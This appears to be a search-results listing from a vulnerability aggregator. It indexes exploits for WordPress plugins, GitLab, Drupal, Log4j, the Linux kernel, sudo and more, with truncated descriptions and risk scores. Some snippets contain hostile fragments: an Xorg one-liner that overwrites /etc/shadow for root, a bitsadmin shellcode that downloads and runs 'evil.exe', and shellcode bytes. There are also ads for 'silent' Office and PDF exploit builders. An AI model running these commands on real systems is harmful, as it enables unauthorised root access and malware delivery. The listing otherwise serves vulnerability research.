Lucene search
K
ZdtMost viewed

39001 matches found

0day.today
0day.today
added 2021/12/04 12:0 a.m.782 views

WordPress Slider by Soliloquy 2.6.2 - (title) Stored Cross Site Scripting Vulnerability

Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting XSS Authenticated Exploit Author: Abdurrahman Erkan @erknabd Vendor Homepage: https://soliloquywp.com/ Software Link: https://wordpress.org/plugins/soliloquy-lite/ Version: 2.6.2 Tested on: Kali Linux...

7.4AI score
Exploits0
0day.today
0day.today
added 2024/09/14 12:0 a.m.781 views

SPIP BigUp 4.3.1 / 4.2.15 / 4.1.17 Unauthenticated Remote Code Execution Exploit

This Metasploit module exploits a Remote Code Execution vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the listerfichiersparchamps function, which is triggered when the bigupretrouverfichiers parameter is set to any value. By exploiting the improper handling of multipart for...

9.8CVSS8.4AI score0.94618EPSS
Exploits7
0day.today
0day.today
added 2021/11/17 12:0 a.m.781 views

GitLab 13.10.2 - Remote Code Execution Exploit

Exploit Title: GitLab 13.10.2 - Remote Code Execution RCE Unauthenticated Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22 Exploit Author: Jacob Baines Vendor Homepage: https://about.gitlab.com/ Software Link: https://gitlab.com/gitlab-org/gitlab...

10CVSS9AI score0.99981EPSS
Exploits57
0day.today
0day.today
added 2022/04/08 12:0 a.m.780 views

AeroCMS 0.0.1 Shell Upload Exploit

AeroCMS-Unrestricted-File-Upload-POC Author: D4rkP0w4r Description = Upload web shell at Post Image in admin panel Step to Reproduct Login to admin panel - Posts - Add Posts - Post Image - upload malicious file shell.php - access /images/shell.php on url - shell.php page Exploit When upload succe...

7.2CVSS0.2AI score0.02504EPSS
Exploits3
0day.today
0day.today
added 2019/04/01 12:0 a.m.778 views

Oracle Weblogic Server Deserialization MarshalledObject Remote Code Execution Exploit

An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object weblogic.corba.utils.MarshalledObject to the interface to execute code on vulnerable hosts. This module requires Metasploit: https://metasploit.com/download Current source:...

10CVSS1.1AI score0.91402EPSS
Exploits7
0day.today
0day.today
added 2023/02/28 12:0 a.m.777 views

WordPress WoodMart Theme 7.1.0 Shortcodes Injection Vulnerability

The WoodMart premium theme for WordPress is vulnerable to unauthenticated arbitrary shortcodes injection in versions 7.1.0 and below. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. ==== Z://USB-00RESEARCH/WORDPRESS/...

9.7AI score0.00523EPSS
Exploits3
0day.today
0day.today
added 2022/07/26 12:0 a.m.775 views

Roxy-WI Remote Command Execution Exploit

This Metasploit module exploits an unauthenticated command injection vulnerability in Roxy-WI versions prior to 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers...

10CVSS8.4AI score0.90387EPSS
Exploits16
0day.today
0day.today
added 2020/06/26 12:0 a.m.775 views

iOS / macOS Wifi Proximity Vulnerability

iOS and macOS suffered from a wifi proximity kernel double-free vulnerability in AWDL BSS Steering. if 0 iOS/MacOS wifi proximity kernel double free in AWDL BSS Steering As part of developing an exploit for CVE-2020-3843 a heap overflow in AWDL I've been looking at the code for "BSS Steering". It...

9.3CVSS0.6AI score0.03504EPSS
Exploits1
0day.today
0day.today
added 2019/04/18 12:0 a.m.775 views

Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not...

10CVSS9.9AI score0.99913EPSS
Exploits20
0day.today
0day.today
added 2005/06/21 12:0 a.m.774 views

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================================== WordPress new or die; &header; print " +---x STEP 1 - TRY GET ADMIN INFO\n"; $reg = $path; $reg .=...

7.1AI score
Exploits0
0day.today
0day.today
added 2014/10/09 12:0 a.m.773 views

Linux Kernel 3.16.1 FUSE Privilege Escalation Exploit

FUSE-based exploit that leverages a flaw in fs/namespace.c where it does not properly restrict clearing MNTNODEV, MNTNOSUID, and MNTNOEXEC and changing MNTATIMEMASK during a remount of a bind mount, which allows local users to gain privileges. Linux kernels through 3.16.1 are affected. / FUSE-bas...

6CVSS1.4AI score0.00888EPSS
Exploits6
0day.today
0day.today
added 2020/10/21 12:0 a.m.772 views

Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit

This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload RAU component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization...

9.8CVSS9.7AI score0.99737EPSS
Exploits19
0day.today
0day.today
added 2019/05/21 12:0 a.m.768 views

Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution Exploit

Exploit for java platform in category web applications / Exploit Title: Brocade Network Advisor - Unauthenticated Remote Code Execution Date: 2017-03-29 Exploit Author: Jakub Palaczynski Vendor Homepage: https://www.broadcom.com/ CVE: CVE-2018-6443 Version: Tested on Brocade Network Advisor 14.X....

4.3CVSS8.1AI score0.07395EPSS
Exploits4
0day.today
0day.today
added 2022/08/01 12:0 a.m.767 views

Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) Exploit

Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow SEH Exploit Author: r00tpgp @ http://www.r00tpgp.com Usage: python easychat-exploit.py Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 CVE: CVE-2004-2466 Installer: http://www.echatserver.com/ Tested on: Microsoft Window...

5CVSS6.6AI score0.74696EPSS
Exploits9
0day.today
0day.today
added 2022/01/20 12:0 a.m.767 views

VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution Exploit

VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux...

10CVSS9.1AI score0.99999EPSS
Exploits351
0day.today
0day.today
added 2019/05/30 12:0 a.m.767 views

Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit

Exploit for windows platform in category local exploits include "hd.h" // EDB Note Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar byte scode= 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x...

7.2CVSS7.9AI score0.87042EPSS
Exploits22
0day.today
0day.today
added 2022/04/27 12:0 a.m.765 views

Redis Lua Sandbox Escape Exploit

This Metasploit module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary...

10CVSS9.9AI score0.9967EPSS
Exploits9
0day.today
0day.today
added 2018/05/02 12:0 a.m.765 views

Exim < 4.90.1 - base64d Remote Code Execution Exploit

Exploit for linux platform in category remote exploits !/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; email protected" print def connecthost, port: global s global f s =...

7.5CVSS0.82238EPSS
Exploits19
0day.today
0day.today
added 2022/02/14 12:0 a.m.763 views

Nagios XI Autodiscovery Shell Upload Exploit

This Metasploit module exploits a path traversal issue in Nagios XI before version 5.8.5. The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as www-data. The module achieves this by creating an autodiscovery job with an id field containin...

8.8CVSS8.8AI score0.2382EPSS
Exploits5
0day.today
0day.today
added 2025/01/08 12:0 a.m.762 views

Selenium Firefox Remote Code Execution Exploit

Selenium Server Grid versions 4.27.0 and below allows cross site request forgery because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain and this issue in turn allows for an attacker to achieve remote code execution. This module...

8.8CVSS9.1AI score0.11675EPSS
Exploits6
0day.today
0day.today
added 2019/06/27 12:0 a.m.762 views

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

0.6AI score
Exploits0
0day.today
0day.today
added 2014/03/05 12:0 a.m.761 views

OpenDocMan 1.2.7 - Multiple Vulnerabilities

OpenDocMan versions 1.2.7 and below suffer from improper access control and remote SQL injection vulnerabilities. Product: OpenDocMan Vendor: Free Document Management Software Vulnerable Versions: 1.2.7 and probably prior Tested Version: 1.2.7 Advisory Publication: February 12, 2014 without...

7.5CVSS9.5AI score0.02582EPSS
Exploits8
0day.today
0day.today
added 2022/03/11 12:0 a.m.760 views

Dirty Pipe Local Privilege Escalation Exploit

This Metasploit module exploits a vulnerability that has been in the Linux kernel since version 5.8. It allows writing of read only or immutable memory. The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102. The module exploits this vulnerability by overwriting a suid binary with the...

7.8CVSS7.8AI score0.89063EPSS
Exploits100
0day.today
0day.today
added 2008/11/02 12:0 a.m.760 views

Maran PHP Shop (prod.php cat) SQL Injection Vulnerability

Exploit for unknown platform in category web applications ========================================================= Maran PHP Shop prod.php cat SQL Injection Vulnerability ========================================================= Maran PHP Shop prod.php cat SQL Injection Vulnerability url:...

7.1AI score
Exploits0
0day.today
0day.today
added 2022/06/16 12:0 a.m.758 views

Microsoft Office Word DOC Silent Arbitrary Code Execution Builder Exploit

0day exploit is a program that injects any executable formatted file .exe into the desired word .doc file...

2.3AI score
Exploits0
0day.today
0day.today
added 2019/11/29 12:0 a.m.755 views

Xiaomi Mi Box Display Corruption Exploit

The vulnerability allows rescaling and corrupting the Xiaomi Mi Box model: MIBOX3, build.id : MHC19 display without any privilege requirement, thus creating an opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can even be used for...

0.7AI score
Exploits0
0day.today
0day.today
added 2018/09/16 12:0 a.m.755 views

STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation Exploit

Exploit for windows platform in category local exploits / Exploit Title: STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation Author: Parvez Anwar @parvezghh Vendor Homepage: https://www.stopzilla.com/ Software link:...

7.2AI score
Exploits0
0day.today
0day.today
added 2022/03/03 12:0 a.m.753 views

Polkit pkexec Local Privilege Escalation Exploit

This is a Metasploit module for the argument processing bug in the polkit pkexec binary. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument...

7.8CVSS8.4AI score0.94921EPSS
Exploits152
0day.today
0day.today
added 2022/07/18 12:0 a.m.752 views

Microsoft Office Excel Silent Builder Exploit

0day exploit is a program that injects any executable formatted file .exe into the desired word .xls file. The exe is automatically executed when the project file is opened...

1.9AI score
Exploits0
0day.today
0day.today
added 2020/07/29 12:0 a.m.751 views

Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Exploit

Exploit for hardware platform in category web applications Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Google Dork: inurl:/+CSCOE+/ Date: 2020-08-27 Exploit Author: 0xmmnbassel Vendor Homepage:...

5CVSS0.2AI score0.99992EPSS
Exploits24
0day.today
0day.today
added 2018/10/26 12:0 a.m.751 views

xorg-x11-server 1.20.3 - Local Privilege Escalation Exploit

Exploit for multiple platform in category local exploits xorg-x11-server Local Privilege Escalation CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow or any file on most Linux, get root privileges. B...

0.2704EPSS
Exploits39
0day.today
0day.today
added 2021/12/20 12:0 a.m.748 views

WordPress Popular Posts 5.3.2 Remote Code Execution Exploit

This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address 192/172/127/10. The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit...

8.8CVSS8.8AI score0.79823EPSS
Exploits5
0day.today
0day.today
added 2020/07/27 12:0 a.m.747 views

Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) Vulnerability

Exploit for php platform in category web applications Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload Authenticated Exploit Author: v1n1v131r4 Vendor Homepage: http://koken.me/ Software Link: https://www.softaculous.com/apps/cms/Koken Version: 0.22.24 Tested on: Linux PoC:...

Exploits0
0day.today
0day.today
added 2019/12/12 12:0 a.m.747 views

Lenovo Power Management Driver 1.67.17.48 - (pmdrvs.sys) Denial of Service Exploit

Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service PoC Exploit Author: Nassim Asrir CVE: CVE-2019-6192 Tested On: Windows 1064bit | ThinkPad T470p Vendor : https://www.lenovo.com/us/en/ Ref : https://support.lenovo.com/us/fr/solutions/len-29334 Description A...

4.4CVSS0.01742EPSS
Exploits5
0day.today
0day.today
added 2009/01/29 12:0 a.m.745 views

Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass

Exploit for unknown platform in category web applications ===================================================== Pligg 9.9.5 XSRF Protection Bypass and Captcha Bypass ===================================================== Written By Michael Brooks Pligg - XSRF Protection Bypass and Captcha Bypass...

7.1AI score
Exploits0
0day.today
0day.today
added 2022/05/03 12:0 a.m.739 views

WSO Arbitrary File Upload / Remote Code Execution Exploit

This Metasploit module abuses a vulnerability in certain WSO2 products that allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0,...

9.8CVSS0.5AI score0.99999EPSS
Exploits22
0day.today
0day.today
added 2017/01/18 12:0 a.m.739 views

SentryHD 02.01.12e - Privilege Escalation Exploit

Exploit for windows platform in category local exploits Exploit Title: SentryHD 02.01.12e Privilege Escalation Date: 18-01-2017 Software Link: http://www.minutemanups.com/ Exploit Author: Kacper Szurek Contact: http://twitter.com/KacperSzurek Website: http://security.szurek.pl/ Category: local 1...

6.8AI score
Exploits0
0day.today
0day.today
added 2023/12/08 12:0 a.m.735 views

WordPress Elementor 3.18.1 File Upload / Remote Code Execution Vulnerabilities

WordPress Elementor plugin versions 3.18.1 and below are vulnerability to remote code execution via file upload in the template import functionality. Vulnerability Summary from Wordfence Intelligence Description: Elementor = 3.18.1 AuthenticatedContributor+ Arbitrary File Upload to Remote Code...

9.9CVSS8.2AI score0.041EPSS
Exploits3
0day.today
0day.today
added 2023/09/26 12:0 a.m.735 views

OPNsense 23.1.11_1 / 23.7.3 / 23.7.4 Cross Site Scripting / Privilege Escalation Vulnerabilities

OPNsense versions 23.1.111, 23.7.3, and 23.7.4 suffer from cross site scripting vulnerabilities that can allow for privilege escalation. OPNsense 23.1.111 / 23.7.3 / 23.7.4 Cross Site Scripting / Privilege Escalation =========================================================== Highest Severity...

6.9AI score
Exploits0
0day.today
0day.today
added 2020/07/19 12:0 a.m.735 views

SMB12 Information Gathering Exploit

SMB12 Information Gathering is a data gathering python script that inspects SMB1 and SMB2 endpoints. It will extract various attributes from the remote server such as OS version only supported by SMB1 as per protocol definition, DNS computer name, DNS domain name, NetBIOS computer name and NetBIO...

7.4AI score
Exploits0
0day.today
0day.today
added 2021/01/03 12:0 a.m.734 views

Adobe Acrobat Reader Silent PDF Exploit 0day

0day PDF Exploit. All Chrome, Edge, Opera, Firefox, Microsoft Internet Explorer, Yandex, tested. Running smoothly Latest version. Adobe Acrobat Reader Works Seamlessly with All Versions of DC Latest version. Windows 7, Windows 8, Windows 8.1, Windows 10 Tested Works in the latest versions. All Ma...

1.8AI score
Exploits0
0day.today
0day.today
added 2006/04/07 12:0 a.m.733 views

Horde Help Viewer <= 3.1 Remote Command Execution Exploit

Exploit for unknown platform in category web applications ========================================================= Horde Help Viewer $host, 'dir=s' = $dir, 'proxy=s' = $proxy, 'proxyuser=s' = $proxyuser, 'proxypass=s' = $proxypass, 'debug' = $debug; &help unless $host; please don't try this...

7.1AI score
Exploits0
0day.today
0day.today
added 2020/02/04 12:0 a.m.732 views

Sudo 1.8.25p - Buffer Overflow Exploit

Title: Sudo 1.8.25p - Buffer Overflow Author: Joe Vennix Software: Sudo Versions: Sudo versions prior to 1.8.26 CVE: CVE-2019-18634 Reference: https://www.sudo.ws/alerts/pwfeedback.html Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting their password. For...

7.8CVSS0.1AI score0.19426EPSS
Exploits13
0day.today
0day.today
added 2018/04/29 12:0 a.m.729 views

Android Bluetooth - Blueborne Information Leak (2) Exploit

Exploit for Android platform in category remote exploits from pwn import import bluetooth if not 'TARGET' in args: log.info"Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX" exit target = args'TARGET' servicelong = 0x0100 serviceshort = 0x0001 mtu = 50 n = 30 def packetservice, continuationstate:...

3.3CVSS0.3AI score0.12388EPSS
Exploits12
0day.today
0day.today
added 2018/04/26 12:0 a.m.727 views

Drupal Drupalgeddon 2 Forms API Property Injection Exploit

This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...

7.5CVSS10AI score0.99993EPSS
Exploits46
0day.today
0day.today
added 2023/08/21 12:0 a.m.726 views

Jorani Remote Code Execution Exploit

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Jorani versions prior to 1.0.2. It abuses log poisoning and redirection bypass via header spoofing and then it uses path traversal to trigger the vulnerability. It has been tested on Jorani 1.0.0. This modul...

9.8CVSS8.2AI score0.81918EPSS
Exploits5
0day.today
0day.today
added 2021/10/13 12:0 a.m.726 views

Moodle Authenticated Spelling Binary Remote Code Execution Exploit

Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the...

9.1CVSS0.8AI score0.42566EPSS
Exploits12
0day.today
0day.today
added 2023/12/05 12:0 a.m.723 views

WordPress MW WP Form 5.0.1 Arbitrary File Upload Vulnerability

Vulnerability Summary from Wordfence Intelligence Description: MW WP Form = 5.0.1 – Unauthenticated Arbitrary File Upload Affected Plugin: MW WP Form Plugin Slug: mw-wp-form Affected Versions: = 5.0.1 CVE ID: CVE-2023-6316 CVSS Score: 9.8 Critical CVSS Vector:...

9.8CVSS9.6AI score0.01448EPSS
Exploits1
0day.today
0day.today
added 2021/12/14 12:0 a.m.723 views

Apache Log4j2 2.14.1 - Information Disclosure Exploit

Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure Date: 12/12/2021 Exploit Author: leonjza Vendor Homepage: https://logging.apache.org/log4j/2.x/ Version: None: printf' i| new connection from self.clientaddress0' sock = self.request sock.recv1024 sock.sendallLDAPHEADER data =...

10CVSS10AI score0.99999EPSS
Exploits351
0day.today
0day.today
added 2018/05/01 12:0 a.m.722 views

Drupal < 7.58 - Drupalgeddon3 Authenticated Remote Code Exploit

Exploit for php platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Drupalgeddon3', 'Description' = %q CVE-2018-7602 / SA-CORE-2018-004 A remote code execution...

9.9AI score0.99236EPSS
Exploits14
Total number of security vulnerabilities5000